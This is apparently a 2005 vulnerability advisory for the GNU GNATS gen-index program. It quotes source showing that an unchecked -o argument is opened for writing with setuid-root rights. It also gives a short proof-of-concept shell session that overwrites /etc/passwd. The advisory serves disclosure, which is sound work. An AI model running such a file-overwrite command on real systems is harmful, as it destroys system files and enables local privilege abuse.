Name:                      GNATS - gen-index 
Vendor URL:                http://www.gnu.org/software/gnats 
Author:                    Adam Zabrocki <pi3ki31ny@wp.pl> 
Date:                      June 16, 2005 

    Issue: 


  GNATS - the GNU problem report management system allows 
attacker to overwrite 
files with privileges suid root (when compiled from sources and 
there isn't in system 
gnats user), where GNATS is installed. 


    Description: 


  GNATS stores all information about the problem reports at a 
central site, and enables 
users to access this site by various means, including e-mail, 
WWW, and a network daemon. 
New problem reports can be created, and existing reports can be 
queried and updated, by 
most of these means. 


    Details: 


Possible overwrite any files in system by gen-index 
program installed 
with GNATS. 


  Local users, able to run gen-index (in some times when GNATS 
was compiled from sources 
and in system don't exist gnats user and group) are able to 
overwrite any files in system. 
  The problem lies in gen-index main() function, which don't 
check argument who was given 
to program and in hard open and write there own data. 

"gnats/gen-index.c" 
int 
main (int argc, char **argv) 
{ 
  ... 
  ... 

    while ((optc = getopt_long (argc, argv, "o:hd:nVie", 
                              long_options, (int *) 0)) != EOF) 
    { 
      switch (optc) 
        { 
        ... 
        ... 
        case 'o': 
          file_name = optarg; 
          break; 

        case 'n': 
          numeric_sorting = TRUE; 
          break; 
... 
... 
        } 
    } 

  ... 
  ... 

  if (file_name) 
    output = fopen (file_name, "w+"); 
  if (output == (FILE *) NULL) 
    { 
      fprintf (stderr, "%s: can't write to %s: %s\n", 
program_name, 
              optarg, strerror (errno)); 
      exit (3); 
    } 

  ... 
  ... 

  if (indexIsBinary (database)) 
    { 
      char numFields = indexFieldCount (database); 
      fwrite (&numFields, 1, 1, output); 
    } 

  ... 
  ... 
  if (numeric_sorting && num_entries > 0) 
    { 
      qsort (entries, num_entries, sizeof (Entry), entry_cmp); 
      for (i = 0; i < num_entries; i++) 
        { 
          fwrite (entries[i].string, 1, entries[i].length, 
output); 
        } 
    } 

  fclose (output); 
  ... 
  exit (0); 
} 


Function fopen() with argument "w+" open file for reading and 
writing. 
The file is created if it does not exist, otherwise it is 
truncated. 
So when gen-index have suid root privilages we can overwrite any 
files 
in system. 


    Exploit: 


  We don't need to write any 31337 exploit. Simple PoC: 

pi3@darkstar:~$ pwd 
/home/pi3 
pi3@darkstar:~$ ls -alh /etc/passwd 
-rw-r--r--    1 root    root          795 May 19 
18:49 /etc/passwd 
pi3@darkstar:~$ ls -alh /usr/local/libexec/gnats/gen-index 
-r-sr-xr-x    1 root    root        465k Nov 21  
2004 /usr/local/libexec/gnats/gen-index* 
pi3@darkstar:~$ /usr/local/libexec/gnats/gen-index -n - 
o /etc/passwd 
pi3@darkstar:~$ ls -alh /etc/passwd 
-rw-r--r--    1 root    root            1 Jun 16 
17:34 /etc/passwd 
pi3@darkstar:~$ cat /etc/passwd 
pi3@darkstar:~$ 


GNATS 4.1.0 and 4.0 are confirmed vulnerable. Probably all 
previous versions are also vulnerable. 

I have informed GNATS team. 

-- 
pi3 (pi3ki31ny) - pi3ki31ny@wp.pl 
http://www.pi3.int.pl